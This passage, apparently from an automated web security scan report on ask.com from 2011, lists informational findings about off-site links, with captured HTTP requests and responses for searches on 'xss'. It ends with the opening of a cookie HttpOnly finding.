<a class="txt_lg title" onmousedown="return pk(this,{en:'bnm',io:'0',b:'alg',tp:'d',ec:'3',url:'http%3A%2F%2Fwww.h-online.com%2Fsecurity%2Fnews%2Fitem%2FPotential-account-theft-with-XSS-hole-in-eBay-de-1320908.html'});"
target="_blank" href="http://c.moreover.com/click/here.pl?z5057314472&amp;z=1250248829">
Potential account theft with <b>
...[SNIP]...



                    <a href="http://www.google.com/aclk?sa=L&ai=C1oCUCGVJTsPILsO3gwfJ0qn8A7aV7ST6xID-Fvf5hBkQASCfkdURKANQ4vbI_QZgydb6hsijoBnIAQGqBBZP0AHWPK-_b-6WwqASd9N6MFl82fnZ&num=1&sig=AOD64_0iz3Mt9YIBxc2_xsKwiXW_QjXhmw&adurl=http://www.aspectsecurity.com/training.html" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(89); if (typeof efclk != 'undefined') efclk(89); return pk(this,{en:'gg',io:'0',b:'spl',tp:'top',ec:'3',ex:'sgst%3D1%26sgcl%3Da533lR-%2525voy%26sgch%3D%26sgmd%3D1'},'gg_0');" class="nu" onmouseover="return ss('www.aspectsecurity.com/training')" onmouseout="cs()" style="display:block;padding:15px 20px 10px 15px;">



...[SNIP]...



                    <a href="http://www.google.com/aclk?sa=L&ai=CIMsmCGVJTsPILsO3gwfJ0qn8A9qirwe6h5a5CISlo70CEAIgn5HVESgDUO_Tz0Vgydb6hsijoBnIAQGqBBZP0AHWPK-8b-7Pw5uu69j48LM-ZiFs&num=2&sig=AOD64_2ZDY-DGLStJt98MUQiVQVnBa6JCg&adurl=http://www.peterblum.com/des/inputsecurity.aspx" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(61); if (typeof efclk != 'undefined') efclk(61); return pk(this,{en:'gg',io:'1',b:'spl',tp:'top',ec:'3',ex:'sgst%3D1%26sgcl%3Da533lR-%2525voy%26sgch%3D%26sgmd%3D1'},'gg_1');" class="nu" onmouseover="return ss('www.peterblum.com')" onmouseout="cs()" style="display:block;padding:0px 20px 10px 15px;">



...[SNIP]...



                    <a href="http://www.google.com/aclk?sa=L&ai=C230qCGVJTsPILsO3gwfJ0qn8A87s4dkB7J3xwg_O6vIPEAMgn5HVESgDUMuYxYL5_____wFgydb6hsijoBnIAQGqBBxP0GHOAK-9b-7ewjMg3erGrFL-GROb2W-c0Ies&num=3&ggladgrp=416374914&gglcreat=4069686294&sig=AOD64_2VTOdMLvJbogrN6h1jY6Lf39LLJA&adurl=http://126.xg4ken.com/media/redir.php%3Fprof%3D8%26camp%3D444%26affcode%3Dkw351934%26cid%3D4069686294%26networkType%3Dsearch%26url%5B%5D%3Dhttp%253A%252F%252Fwww.target.com%252Fgp%252Fredirect.html%252Fref%253Dtgt_adv_XS000000%253FURL%253D%252Fgp%252Fsearch%25253Ffield-keywords%25253Dxxs%252526AFID%25253Dgoogle%252526CPNG%25253Dpets%252526LNM%25253DXXS%252526LID%25253D8p351934%252526adgroup%25253Dpets%252526MT%25253Dbroad%252526KID%25253D_kenshoo_clickid_" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(50); if (typeof efclk != 'undefined') efclk(50); return pk(this,{en:'gg',io:'2',b:'spl',tp:'top',ec:'3',ex:'sgst%3D1%26sgcl%3Da533lR-%2525voy%26sgch%3D%26sgmd%3D1'},'gg_2');" class="nu" onmouseover="return ss('www.target.com/FreeShipping')" onmouseout="cs()" style="display:block;padding:0px 20px 15px 15px;">



...[SNIP]...
<div id="r_t1">
<a class="txt_lg title" onmousedown="return pk(this,{en:'bnm',io:'1',b:'alg',tp:'d',ec:'3',url:'http%3A%2F%2Ffeeds.pcworld.com%2Fclick.phdo%3Fi%3Dc762f0dd663fd19ae83733752c2bf4af'});"
target="_blank" href="http://c.moreover.com/click/here.pl?z5042337493&amp;z=1250248829">
Bugs and Fixes: Apple Patches Safari and iOS Holes, Skype Blocks <b>
...[SNIP]...
<div id="r_t2">
<a class="txt_lg title" onmousedown="return pk(this,{en:'bnm',io:'2',b:'alg',tp:'d',ec:'3',url:'http%3A%2F%2Fwww.globalsecuritymag.com%2FVeracode-Makes-Urgent-Detection-of%2C20110802%2C25107.html'});"
target="_blank" href="http://c.moreover.com/click/here.pl?z5028575675&amp;z=1250248841">
Veracode Makes Urgent Detection of SQL Injection and <b>
...[SNIP]...



<a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" id="" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...



<a href="http://asksupport.custhelp.com/app/answers/list" id="" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...

6.2. http://www.ask.com/pictures  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pictures?o=0&l=dir&qsrc=167&q=xss&v=14 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/web?q=xss&search=&qsrc=0&o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjM5LVVUQw%3D%3D&po=0&pp=dir; qc=0; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; wz_sid=084EE34C926D4254193520127E77B26A; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.2.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: Tklk8ApcQKMAAFY@f2wAAAEE
from-tr: trafrt011iad.io.askjeeves.info
Content-Length: 115264
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:26:56 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjU2LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:26:56 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...
</a>


<a href="http://ask.pronto.com/user/search.do?&q=xss" class="txt3" style="color: #0055CC;">Shopping</a>
...[SNIP]...



<a href="http://www.askkids.com?o=0&l=dir"
class="txt3" style="color: #0055CC;">
Kids</a>
...[SNIP]...
<div id="di0"><img id="image0" src="http://media2.picsearch.com/is?1Aemy_pvVeQBaY6537DmXW1zPaFoc-puZwtZNw4sFSM" border="0" hspace="0" vspace="0"

width="128"
/>
</div>
...[SNIP]...
<div id="di1"><img id="image1" src="http://media2.picsearch.com/is?9_uQ-3tPaYu7wZjK7wrUzkbr4g6MZKta3nG7zOpmQTY" border="0" hspace="0" vspace="0"

width="128"
/>
</div>
...[SNIP]...
<div id="di2"><img id="image2" src="http://media5.picsearch.com/is?Z6y7aBM0OeulcXcLwbIiofRYPQtqoY7KPxQj5wpUFkA" border="0" hspace="0" vspace="0"


height="128" />
</div>
...[SNIP]...
<div id="di3"><img id="image3" src="http://media4.picsearch.com/is?JuK-vkc27Rclkk-nZfn9nqMsMJ3cJbQGWA8y_Ts1HxE" border="0" hspace="0" vspace="0"


height="128" />
</div>
...[SNIP]...
<div id="di4"><img id="image4" src="http://media2.picsearch.com/is?JdaDoTf7TfqBaMk2lwl5QnyspvybvoHAJILXgME9XuU" border="0" hspace="0" vspace="0"


height="128" />
</div>
...[SNIP]...
<div id="di5"><img id="image5" src="http://media2.picsearch.com/is?he-5FLdNUOto5V9iqoamNNEYjEJkNb_WeUbOQDbwXNA" border="0" hspace="0" vspace="0"

width="128"
/>
</div>
...[SNIP]...
<div id="di6"><img id="image6" src="http://media1.picsearch.com/is?PF2IQLl4HbJP2KV734tDhJTfnP6GAwOeB_VWHC9zPwk" border="0" hspace="0" vspace="0"


height="128" />
</div>
...[SNIP]...
<div id="di7"><img id="image7" src="http://media2.picsearch.com/is?R8K3N4JSEPKJqOoNJc3V7NlCKjKUv5s3KUb9DoxoiSA" border="0" hspace="0" vspace="0"

width="128"
/>
</div>
...[SNIP]...
<div id="di8"><img id="image8" src="http://media5.picsearch.com/is?LizEIJ99sbs211ixkqjMnplBtS3AjfGaadnZHZ13XbY" border="0" hspace="0" vspace="0"

width="128"
/>
</div>
...[SNIP]...
<div id="di9"><img id="image9" src="http://media4.picsearch.com/is?ergdVNZEO_RfJffNEWknMGWIjJp17lSuAlGwW8FbDlk" border="0" hspace="0" vspace="0"


height="128" />
</div>
...[SNIP]...
<div id="di10"><img id="image10" src="http://media4.picsearch.com/is?UBEriv_LpvZ-s6YV36eyhIAhJjFQVBIVm8RI1t7PlfU" border="0" hspace="0" vspace="0"

width="128"
/>
</div>
...[SNIP]...
<div id="di11"><img id="image11" src="http://media4.picsearch.com/is?jVshkH8bMOzEkF5uDY96xFqSqSO49PJxq6jDEfaSzd4" border="0" hspace="0" vspace="0"

width="128"
/>
</div>
...[SNIP]...
<div id="di12"><img id="image12" src="http://media1.picsearch.com/is?Zf7dX1dxFxM2L0iKSP8jVVVSocNS9xrEHQ5XJsMoKVU" border="0" hspace="0" vspace="0"


height="128" />
</div>
...[SNIP]...
<div id="di13"><img id="image13" src="http://media1.picsearch.com/is?DJW-3_Wuj6iqphmjkaiUP7JhCak6OHfMJT0nHpvHyHg" border="0" hspace="0" vspace="0"

width="128"
/>
</div>
...[SNIP]...
<div id="di14"><img id="image14" src="http://media2.picsearch.com/is?XQOpo2C426iLjDrTT9AIM2NPyYfwVVaTOn4pdtsPakE" border="0" hspace="0" vspace="0"


height="128" />
</div>
...[SNIP]...
<div id="di15"><img id="image15" src="http://media5.picsearch.com/is?IuLbB6oJs2yTgFH_ZCVFdKpeb9DRh8UheSsHYzVgu5I" border="0" hspace="0" vspace="0"


height="128" />
</div>
...[SNIP]...
<div id="di16"><img id="image16" src="http://media4.picsearch.com/is?khkNAgjOCGXoPhAOuorc2YrNiSLSVakyfH54dFChurQ" border="0" hspace="0" vspace="0"

width="128"
/>
</div>
...[SNIP]...
<div id="di17"><img id="image17" src="http://media1.picsearch.com/is?FP_2ViFGwWgwQD-8wMaw9j0mTiEgLU28X2l1l0g4Jb4" border="0" hspace="0" vspace="0"

width="128"
/>
</div>
...[SNIP]...



<a href="http://www.google.com/aclk?sa=L&ai=CzJpc8GRJTsrqC4WVgge9j_mfBLaV7ST6xID-Fvf5hBkQASCJ9pACUOL2yP0GYMnW-obIo6AZyAEBqgQWT9BHlq7lswmvxNjnhvOb_If3s4WTMg&num=1&sig=AOD64_05ElYm_red2s5oYng2bkv6c3MlxA&adurl=http://www.aspectsecurity.com/training.html" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(36); if (typeof efclk != 'undefined') efclk(36); return pk(this,{en:'gg',io:'0',b:'spl',tp:'bot',ec:'1',ex:'sgst%3D1%26sgcl%3D432arO-uQX2RB%252B%26sgch%3Dd077b8DZv3cpk-vKe5DadH%26sgmd%3D1'},'gg_0');" class="nu" onmouseover="return ss('www.aspectsecurity.com/training')" onmouseout="cs()" style="display:block;padding:15px 20px 15px 15px;">



...[SNIP]...



<a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" id="" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...



<a href="http://asksupport.custhelp.com/app/answers/list" id="" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...

6.3. http://www.ask.com/web  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /web

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /web?q=xss&search=&qsrc=0&o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjAyLVVUQw%3D%3D&po=0&pp=dir; qc=0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.1.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_uid=0A42E34A946D4254193520127E77B26A; wz_sid=084EE34C926D4254193520127E77B26A; wz_scnt=1

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TklkhQpcQDoAAAxvduAAAAL7
from-tr: trafrt010iad.io.askjeeves.info
Content-Length: 109507
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:25:09 GMT
Connection: close
Set-Cookie: gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; Domain=.ask.com; Expires=Wed, 14-Sep-2011 18:25:09 GMT; Path=/
Set-Cookie: clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; Domain=.ask.com; Expires=Wed, 14-Sep-2011 18:25:09 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-eHNz; Domain=.ask.com; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI1OjA5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:25:09 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   

<title>Ask.com - W
...[SNIP]...
</a>


<a href="http://ask.pronto.com/user/search.do?&q=xss" class="txt3" style="color: #0055CC;">Shopping</a>
...[SNIP]...



<a href="http://www.askkids.com?o=0&l=dir"
class="txt3" style="color: #0055CC;">
Kids</a>
...[SNIP]...
<span><a class="title txt_lg b title" href="http://studio-5.financialcontent.com/ask/quote?Symbol=399:3613634" onmousedown="return pk(this,{en:'da',io:'0',b:'a001',tp:'41',ec:'3',ex:'da_sn%3D00090%26da_lhs%3D2012522%26da_lhx%3Dpra%253A%2Bstocks%253A%2Bstox%253A%2Bsimple_ask11%253A0%253A%2BFinCon%26da_rhs%3D2014016%26da_rht%3DLink%26da_rhx%3DDbxt%2BS%2526amp%253Bp%2B500%2BId%2B1cc%2B%2528XSS%2529%26da_sro%3D2014013%26da_stp%3D1%26da_iid%3D0001%26da_lit%3DDbxt%2BS%2526p%2B500%2BId%2B1cc%2B%2528XSS%2529%26da_origin%3Draw'});" target="_blank" ><span >
...[SNIP]...
<td style="padding-right:10px;">


<a href="http://studio-5.financialcontent.com/ask/quote?Symbol=XSS" onmousedown="return pk(this,{en:'stsa',io:'1',b:'a001',tp:'41',ec:'1',ex:'da_sn%3D00090%26da_lhs%3D2012522%26da_lhx%3Dpra%253A%2Bstocks%253A%2Bstox%253A%2Bsimple_ask11%253A0%253A%2BFinCon%26da_rhs%3D0%26da_rht%3DFragment%26da_rhx%3Dstox%26da_sro%3D2014013%26da_stp%3D1%26da_iid%3D0001%26da_lit%3DDbxt%2BS%2526p%2B500%2BId%2B1cc%2B%2528XSS%2529%26da_origin%3Draw'})"><img src="http://chart.financialcontent.com/Chart?width=200&vucolor=008000&bvcolor=FFFFFF&gmcolor=DDDDDD&ticker=399:3613634&gtcolor=FFCC00&bgcolor=null&fillshy=-2&gbcolor=FFFFFF&Client=ask&brcolor=999999&pvcolor=B50000&ibcolor=null&vdcolor=FF0000&volume=0&fillshx=2&fillalpha=50&fillshalpha=20&interval=1&height=100&lncolor=666666&arcolor=null&txcolor=444444&itcolor=666666&grcolor=DDDDDD&type=0&shcolor=BBBBBB&shwidth=2" border="0"/></a>
...[SNIP]...
<td colspan="2">
<a class="txt3 cached title" href="http://studio-5.financialcontent.com/ask/quote/news?Symbol=399:3613634&ChannelType=PRESSRELEASES">Company News</a>
&#183;
<a class="txt3 cached title" href="http://studio-5.financialcontent.com/ask/quote/profile?Symbol=399:3613634">Profile</a>
&#183;
<a class="txt3 cached title" href="http://studio-5.financialcontent.com/ask/quote?Symbol=399:3613634">Market Summary</a>
...[SNIP]...



<img src="http://4.afs.googleadservices.com/images/partners/CJiAyZD20aoCFcjb4Aod9gMlSQ/aj-cat.png" style="display:none;" height="1px" width="1px" alt=""/>


<span class="T7 fr tp info txt0">
...[SNIP]...



<a href="http://www.google.com/aclk?sa=L&ai=Cof4shWRJTtipD8i3gwf2h5TJBLaV7ST6xID-Fvf5hBkIABABIPv-gQMoAlDi9sj9BmDJ1vqGyKOgGcgBAaoEFk_QFtXCk1wXoCEwjcXz2v4hhc8TEII&sig=AOD64_2aKkjLfU8lPDwyq1QBm1x8wsdskg&adurl=http://www.aspectsecurity.com/training.html" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(62); if (typeof efclk != 'undefined') efclk(62); return pk(this,{en:'gg',io:'0',b:'spl',tp:'top',ec:'2',ex:'sgst%3D1%26sgcl%3Dc5c6w1-%2525Xt%26sgch%3D027bXbJ0S3Nu6-IzDXg1bq%26sgmd%3D1'},'gg_0');" class="nu" onmouseover="return ss('www.aspectsecurity.com/training')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_0" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=Cof4shWRJTtipD8i3gwf2h5TJBLaV7ST6xID-Fvf5hBkIABABIPv-gQMoAlDi9sj9BmDJ1vqGyKOgGcgBAaoEFk_QFtXCk1wXoCEwjcXz2v4hhc8TEII&sig=AOD64_2aKkjLfU8lPDwyq1QBm1x8wsdskg&adurl=http://www.aspectsecurity.com/training.html" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(62); if (typeof efclk != 'undefined') efclk(62); return pk(this,{en:'gg',io:'0',b:'spl',tp:'top',ec:'2',ex:'sgst%3D1%26sgcl%3Dc5c6w1-%2525Xt%26sgch%3D027bXbJ0S3Nu6-IzDXg1bq%26sgmd%3D1'},'gg_0');" class="nu" onmouseover="return ss('www.aspectsecurity.com/training')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...



<a href="http://www.google.com/aclk?sa=L&ai=C81AahWRJTtipD8i3gwf2h5TJBNqirwe6h5a5CISlo70CCAAQAiD7_oEDKAJQ79PPRWDJ1vqGyKOgGcgBAaoEFk_QFtXCk18XoHgxtnlv0Xzhb42syDc&sig=AOD64_1nu9xDLYhODjv9939ihFMg_Hwk2Q&adurl=http://www.peterblum.com/des/inputsecurity.aspx" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(65); if (typeof efclk != 'undefined') efclk(65); return pk(this,{en:'gg',io:'1',b:'spl',tp:'top',ec:'2',ex:'sgst%3D1%26sgcl%3Dc5c6w1-%2525Xt%26sgch%3D027bXbJ0S3Nu6-IzDXg1bq%26sgmd%3D1'},'gg_1');" class="nu" onmouseover="return ss('www.peterblum.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_1" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=C81AahWRJTtipD8i3gwf2h5TJBNqirwe6h5a5CISlo70CCAAQAiD7_oEDKAJQ79PPRWDJ1vqGyKOgGcgBAaoEFk_QFtXCk18XoHgxtnlv0Xzhb42syDc&sig=AOD64_1nu9xDLYhODjv9939ihFMg_Hwk2Q&adurl=http://www.peterblum.com/des/inputsecurity.aspx" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(65); if (typeof efclk != 'undefined') efclk(65); return pk(this,{en:'gg',io:'1',b:'spl',tp:'top',ec:'2',ex:'sgst%3D1%26sgcl%3Dc5c6w1-%2525Xt%26sgch%3D027bXbJ0S3Nu6-IzDXg1bq%26sgmd%3D1'},'gg_1');" class="nu" onmouseover="return ss('www.peterblum.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...
</b>) is a type of computer security vulnerability typically found in web applications that enables attackers to inject client-side ...

<a href="http://en.wikipedia.org/wiki/Cross-site_scripting" onmousedown="return pk(this,{en:'vwki',io:'1',b:'a002',tp:'d',ec:'1',ex:'tsrc%3DRFE'})" class="L2 fcolor" style="white-space:nowrap" target="_blank">View article on Wikipedia &#187;</a>
...[SNIP]...
</b> may refer to: Cross-site scripting, a vulnerability in web applications ...

<a href="http://en.wikipedia.org/wiki/XSS" onmousedown="return pk(this,{en:'vwki',io:'2',b:'a003',tp:'d',ec:'1',ex:'tsrc%3DRFE'})" class="L2 fcolor" style="white-space:nowrap" target="_blank">View article on Wikipedia &#187;</a>
...[SNIP]...
<div class="pl10">
   
<a class="title txt3" onmousedown="return pk(this,{en:'ns',io:'0',b:'a004',tp:'d',ec:'1'})" target="_blank" href="http://c.moreover.com/click/here.pl?z5073683526&amp;amp;z=1250248829" onmouseover="return ss('http://www.linuxtoday.com/security/2011081500739OSSW')" onmouseout="cs()" ><b>
...[SNIP]...
<div id="r_t4">


<a id="r4_t" href="https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)" onmousedown="return fp(this,{en:'te',io:'0',b:'a005',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank"><b>
...[SNIP]...
<div id="r_t5">


<a id="r4_t" href="http://www.cgisecurity.com/xss-faq.html" onmousedown="return fp(this,{en:'te',io:'0',b:'a006',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank">The <b>
...[SNIP]...
<div id="r_t6">


<a id="r5_t" href="http://ha.ckers.org/xss.html" onmousedown="return fp(this,{en:'te',io:'0',b:'a007',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank"><b>
...[SNIP]...
<div id="r_t7">


<a id="r6_t" href="http://www.acunetix.com/websitesecurity/xss.htm" onmousedown="return fp(this,{en:'te',io:'0',b:'a008',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank"><b>
...[SNIP]...
<div id="r_t8">


<a id="r7_t" href="http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting" onmousedown="return fp(this,{en:'te',io:'0',b:'a009',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank">The Web Application Security Consortium / <b>
...[SNIP]...
<div id="r_t9">


<a id="r8_t" href="http://xss-proxy.sourceforge.net/" onmousedown="return fp(this,{en:'te',io:'0',b:'a010',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank"><b>
...[SNIP]...



<a href="http://www.google.com/aclk?sa=L&ai=Cof4shWRJTtipD8i3gwf2h5TJBLaV7ST6xID-Fvf5hBkIABABIPv-gQMoAlDi9sj9BmDJ1vqGyKOgGcgBAaoEFk_QFtXCk1wXoCEwjcXz2v4hhc8TEII&sig=AOD64_2aKkjLfU8lPDwyq1QBm1x8wsdskg&adurl=http://www.aspectsecurity.com/training.html&ba=1" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(81); if (typeof efclk != 'undefined') efclk(81); return pk(this,{en:'gg',io:'0',b:'spl',tp:'bot',ec:'2',ex:'sgst%3D1%26sgcl%3Dc5c6w1-%2525Xt%26sgch%3D027bXbJ0S3Nu6-IzDXg1bq%26sgmd%3D1'},'gg_0');" class="nu" onmouseover="return ss('www.aspectsecurity.com/training')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_0" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=Cof4shWRJTtipD8i3gwf2h5TJBLaV7ST6xID-Fvf5hBkIABABIPv-gQMoAlDi9sj9BmDJ1vqGyKOgGcgBAaoEFk_QFtXCk1wXoCEwjcXz2v4hhc8TEII&sig=AOD64_2aKkjLfU8lPDwyq1QBm1x8wsdskg&adurl=http://www.aspectsecurity.com/training.html&ba=1" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(81); if (typeof efclk != 'undefined') efclk(81); return pk(this,{en:'gg',io:'0',b:'spl',tp:'bot',ec:'2',ex:'sgst%3D1%26sgcl%3Dc5c6w1-%2525Xt%26sgch%3D027bXbJ0S3Nu6-IzDXg1bq%26sgmd%3D1'},'gg_0');" class="nu" onmouseover="return ss('www.aspectsecurity.com/training')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...



<a href="http://www.google.com/aclk?sa=L&ai=C81AahWRJTtipD8i3gwf2h5TJBNqirwe6h5a5CISlo70CCAAQAiD7_oEDKAJQ79PPRWDJ1vqGyKOgGcgBAaoEFk_QFtXCk18XoHgxtnlv0Xzhb42syDc&sig=AOD64_1nu9xDLYhODjv9939ihFMg_Hwk2Q&adurl=http://www.peterblum.com/des/inputsecurity.aspx&ba=1" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(90); if (typeof efclk != 'undefined') efclk(90); return pk(this,{en:'gg',io:'1',b:'spl',tp:'bot',ec:'2',ex:'sgst%3D1%26sgcl%3Dc5c6w1-%2525Xt%26sgch%3D027bXbJ0S3Nu6-IzDXg1bq%26sgmd%3D1'},'gg_1');" class="nu" onmouseover="return ss('www.peterblum.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_1" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=C81AahWRJTtipD8i3gwf2h5TJBNqirwe6h5a5CISlo70CCAAQAiD7_oEDKAJQ79PPRWDJ1vqGyKOgGcgBAaoEFk_QFtXCk18XoHgxtnlv0Xzhb42syDc&sig=AOD64_1nu9xDLYhODjv9939ihFMg_Hwk2Q&adurl=http://www.peterblum.com/des/inputsecurity.aspx&ba=1" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(90); if (typeof efclk != 'undefined') efclk(90); return pk(this,{en:'gg',io:'1',b:'spl',tp:'bot',ec:'2',ex:'sgst%3D1%26sgcl%3Dc5c6w1-%2525Xt%26sgch%3D027bXbJ0S3Nu6-IzDXg1bq%26sgmd%3D1'},'gg_1');" class="nu" onmouseover="return ss('www.peterblum.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...



<a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" id="" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...



<a href="http://asksupport.custhelp.com/app/answers/list" id="" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...

7. Cookie without HttpOnly flag set  previous  next
There are 6 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

